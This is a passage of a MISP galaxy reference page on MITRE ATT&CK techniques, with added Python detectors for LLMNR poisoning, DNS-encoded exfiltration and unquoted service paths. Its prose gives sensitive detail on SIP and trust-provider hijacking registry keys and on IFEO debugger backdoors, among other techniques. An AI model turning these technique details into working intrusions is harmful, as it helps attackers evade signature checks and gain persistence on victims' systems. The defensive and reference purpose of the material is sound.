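        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def parse_llmnr_message(msg: bytes) -> dict:
    """Return the transaction ID, response flag, question names and A-record answers."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        name, off = decode_name(msg, off)
        off += 4  # QTYPE and QCLASS
        questions.append(name)
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def poisoner_addresses(msg: bytes, canary: str, txid: int):
    """Addresses that answered for the canary name. The canary is not a real host,
    so no legitimate responder exists; every hit is a spoofer to investigate.
    Returns None when the packet is not a response to our own query."""
    parsed = parse_llmnr_message(msg)
    if not parsed["is_response"] or parsed["id"] != txid:
        return None
    return [ip for name, ip in parsed["answers"] if name.lower() == canary.lower()]


# Constructed sample: what a poisoner's answer to the canary query looks like on the wire.
CANARY, TXID = "FILESRV-CANARY", 0x1234
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", TXID, 0x8000, 1, 1, 0, 0)
    + encode_name(CANARY) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    + b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4) + bytes([10, 0, 0, 66])
)

if __name__ == "__main__":
    print(build_llmnr_query(CANARY, TXID).hex())
    print(poisoner_addresses(SAMPLE_RESPONSE, CANARY, TXID))  # ['10.0.0.66']
```

On a live segment the query bytes are sent to 224.0.0.252 on UDP 5355 and every datagram received back is passed through poisoner_addresses; the answering address is the host the Network Traffic data sources listed below should surface.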
Internal MISP references
UUID 650c784b-7504-4df7-ab2c-4ea882384d1e
which can be used as unique global reference for LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1557/001 - webarchive
- https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html - webarchive
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html - webarchive
- https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution - webarchive
- https://github.com/Kevin-Robertson/Conveigh - webarchive
- https://github.com/SpiderLabs/Responder - webarchive
- https://github.com/nomex/nbnspoof - webarchive
- https://technet.microsoft.com/library/cc958811.aspx - webarchive
- https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response - webarchive
- https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1557.001 |
kill_chain | ['attack-Windows:credential-access', 'attack-Windows:collection'] |
mitre_data_sources | ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
Internal MISP references
UUID fb8d023d-45be-47e9-bc51-f56bcae6435b
which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.003 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration', 'attack-Network:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.
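Detection logic for the encoding-in-DNS variant described in this entry and in T1048.003 above, as an added example that is not part of either ATT&CK entry: it scores query names for long, base64-shaped, high-entropy labels and counts distinct subdomains per client and zone. The log format, the client address, the zones and the two-label zone assumption are constructed for the example.

```python
import math
import re
from collections import Counter, defaultdict

# Labels made only of base64 characters (standard or URL-safe alphabet).
ENCODED_LABEL_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded data scores well above ordinary host names."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_zone(qname: str):
    """Assumption: the registrable zone is the last two labels. A real deployment
    should use the public suffix list, since e.g. example.co.uk has three."""
    parts = qname.rstrip(".").split(".")
    if len(parts) < 3:
        return None, qname
    return ".".join(parts[:-2]), ".".join(parts[-2:])


def looks_encoded(subdomain: str, min_label: int = 20, min_entropy: float = 3.5) -> bool:
    """Flag subdomains whose longest label is long, base64-shaped and high-entropy."""
    labels = subdomain.split(".")
    if not all(ENCODED_LABEL_RE.match(label) for label in labels):
        return False
    longest = max(labels, key=len)
    return len(longest) >= min_label and shannon_entropy(longest) >= min_entropy


def analyze(log: str):
    """Each constructed log line is: <client-ip> <query-name> <qtype>.
    Returns the flagged query names and, per (client, zone), how many distinct
    subdomains were asked for; a tunnel produces many unique names under one zone."""
    flagged = []
    unique_subs = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        client, qname, _qtype = line.split()
        sub, zone = split_zone(qname)
        if sub is None:
            continue
        unique_subs[(client, zone)].add(sub)
        if looks_encoded(sub):
            flagged.append(qname)
    counts = {key: len(subs) for key, subs in unique_subs.items()}
    return flagged, counts


# Constructed sample log; the long labels stand in for base64 chunks of collected data.
SAMPLE_LOG = """\
10.20.0.15 www.example.com A
10.20.0.15 mail.example.com A
10.20.0.15 U2VjcmV0RmlsZUNvbnRlbnRz.0.drop.example.net A
10.20.0.15 QWNjb3VudHMtUGF5YWJsZQ.1.drop.example.net A
10.20.0.15 cdn.static.example.org A
"""

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```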
Internal MISP references
UUID 37047267-3e56-453c-833e-d92b68118120
which can be used as unique global reference for Exfiltration Over Unencrypted Non-C2 Protocol - T1639.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1639.001 |
kill_chain | ['mobile-attack-Android:exfiltration', 'mobile-attack-iOS:exfiltration'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Match Legitimate Name or Location - T1036.005
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
Internal MISP references
UUID 1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
which can be used as unique global reference for Match Legitimate Name or Location - T1036.005
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1036.005 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Containers:defense-evasion'] |
mitre_data_sources | ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Creation', 'Process: Process Metadata'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Containers'] |
Related clusters
To see the related clusters, click here.
Match Legitimate Name or Location - T1655.001
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by giving artifacts the name and icon of a legitimate, trusted application (i.e., Settings), or using a package name that matches legitimate, trusted applications (i.e., com.google.android.gm).
Adversaries may also use the same icon of the file or application they are trying to mimic.
Internal MISP references
UUID 114fed8b-7eed-4136-8b9c-411c5c7fff4b
which can be used as unique global reference for Match Legitimate Name or Location - T1655.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1655.001 |
kill_chain | ['mobile-attack-Android:defense-evasion', 'mobile-attack-iOS:defense-evasion'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Disable or Modify System Firewall - T1562.004
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. Non-Standard Port).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various Remote Services may also indirectly modify firewall rules.
Internal MISP references
UUID 5372c5fe-f424-4def-bcd5-d3a8e770f07b
which can be used as unique global reference for Disable or Modify System Firewall - T1562.004
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.004 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Cloud Firewall - T1562.007
Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in Disable or Modify System Firewall.
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
Internal MISP references
UUID 77532a55-c283-4cd2-bc5d-2d0b65e9d88c
which can be used as unique global reference for Disable or Modify Cloud Firewall - T1562.007
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.007 |
kill_chain | ['attack-IaaS:defense-evasion'] |
mitre_data_sources | ['Firewall: Firewall Disable', 'Firewall: Firewall Rule Modification'] |
mitre_platforms | ['IaaS'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Cloud Logs - T1562.008
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
Internal MISP references
UUID cacc40da-4c9e-462c-80d5-fd70a178b12d
which can be used as unique global reference for Disable or Modify Cloud Logs - T1562.008
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1562/008 - webarchive
- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html - webarchive
- https://cloud.google.com/logging/docs/audit/configure-data-access - webarchive
- https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html - webarchive
- https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete - webarchive
- https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/ - webarchive
- https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py - webarchive
- https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.008 |
kill_chain | ['attack-IaaS:defense-evasion', 'attack-SaaS:defense-evasion', 'attack-Google-Workspace:defense-evasion', 'attack-Azure-AD:defense-evasion', 'attack-Office-365:defense-evasion'] |
mitre_data_sources | ['Cloud Service: Cloud Service Disable', 'Cloud Service: Cloud Service Modification', 'User Account: User Account Modification'] |
mitre_platforms | ['IaaS', 'SaaS', 'Google Workspace', 'Azure AD', 'Office 365'] |
Related clusters
To see the related clusters, click here.
SIP and Trust Provider Hijacking - T1553.003
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
- Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
- Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
- Modifying the DLL and Function Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking a SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
- Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
Internal MISP references
UUID 543fceb5-cb92-40cb-aacf-6913d4db58bc
which can be used as unique global reference for SIP and Trust Provider Hijacking - T1553.003
in MISP communities and other software using the MISP galaxy
External references
- http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - webarchive
- https://attack.mitre.org/techniques/T1553/003 - webarchive
- https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - webarchive
- https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - webarchive
- https://github.com/mattifestation/PoCSubjectInterfacePackage - webarchive
- https://msdn.microsoft.com/library/ms537359.aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - webarchive
- https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1553.003 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Modification', 'Module: Module Load', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Windows Management Instrumentation Event Subscription - T1546.003
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using mofcomp.exe – into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
Internal MISP references
UUID 910906dd-8c0a-475a-9cc1-5e029e2fad58
which can be used as unique global reference for Windows Management Instrumentation Event Subscription - T1546.003
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1546/003 - webarchive
- https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - webarchive
- https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - webarchive
- https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
- https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - webarchive
- https://www.secureworks.com/blog/wmi-persistence - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1546.003 |
kill_chain | ['attack-Windows:privilege-escalation', 'attack-Windows:persistence'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Creation', 'Process: Process Creation', 'WMI: WMI Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Exfiltration to Text Storage Sites - T1567.003
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information.
Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
Note: This is distinct from Exfiltration to Code Repository, which highlights access to code repositories via APIs.
Internal MISP references
UUID ba04e672-da86-4e69-aa15-0eca5db25f43
which can be used as unique global reference for Exfiltration to Text Storage Sites - T1567.003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1567.003 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Executable Installer File Permissions Weakness - T1574.005
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
Internal MISP references
UUID 70d81154-b187-45f9-8ec5-295d01255979
which can be used as unique global reference for Executable Installer File Permissions Weakness - T1574.005
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.005 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Module: Module Load', 'Process: Process Creation', 'Service: Service Metadata'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Path Interception by Unquoted Path - T1574.009
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (stored in Windows Registry keys) (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
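An audit of the resolution order behind this entry, as an added example that is not part of the ATT&CK entry: for an unquoted ImagePath it lists the prefixes Windows would try before the intended binary, which are the locations whose write permissions a defender needs to verify. The service names, paths and the set of program extensions are assumptions for the example.

```python
import ntpath

# Extensions taken to mark a complete program name; the first prefix carrying one
# is treated as the intended binary (an assumption used for the audit).
PROGRAM_EXTENSIONS = {".exe", ".com", ".bat", ".cmd"}


def unquoted_path_candidates(image_path: str) -> list:
    """Executables Windows tries, in order, when resolving a command line.

    For an unquoted path with spaces, each prefix up to a space is tried as the
    program (".exe" is appended when it has no extension) and the remainder is
    treated as arguments. A quoted path yields only the quoted program."""
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end]] if end > 0 else []
    candidates = []
    pos = 0
    while True:
        space = image_path.find(" ", pos)
        prefix = image_path if space == -1 else image_path[:space]
        _, ext = ntpath.splitext(prefix)
        candidates.append(prefix if ext else prefix + ".exe")
        if space == -1 or ext.lower() in PROGRAM_EXTENSIONS:
            break
        pos = space + 1
    return candidates


def interception_points(image_path: str) -> list:
    """Paths a planted file could occupy to be launched instead of the real binary."""
    return unquoted_path_candidates(image_path)[:-1]


def audit_service_paths(services: dict) -> dict:
    """Map service name -> interception points for every vulnerable ImagePath."""
    findings = {}
    for name, path in services.items():
        points = interception_points(path)
        if points:
            findings[name] = points
    return findings


# Constructed snapshot of ImagePath values, as a Services registry export would list them.
SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files\My Svc\svc.exe -k netsvcs",
    "SafeSvc": r'"C:\Program Files\My Svc\svc.exe" -k netsvcs',
    "CoreSvc": r"C:\Windows\system32\svchost.exe -k netsvcs",
    "ShortcutApp": r"C:\program files\myapp.exe",
}

if __name__ == "__main__":
    for service, points in audit_service_paths(SAMPLE_SERVICES).items():
        print(service, "->", points)
```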
Internal MISP references
UUID bf96a5a3-3bce-43b7-8597-88545984c07b
which can be used as unique global reference for Path Interception by Unquoted Path - T1574.009
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1574/009 - webarchive
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - webarchive
- https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 - webarchive
- https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ - webarchive
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.009 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Image File Execution Options Injection - T1546.012
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<executable>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
Internal MISP references
UUID 6d4a7fb3-5a24-42be-ae61-6728a2b581f6
which can be used as unique global reference for Image File Execution Options Injection - T1546.012
in MISP communities and other software using the MISP galaxy
External references
- http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ - webarchive
- https://attack.mitre.org/techniques/T1546/012 - webarchive
- https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/ - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview - webarchive
- https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit - webarchive
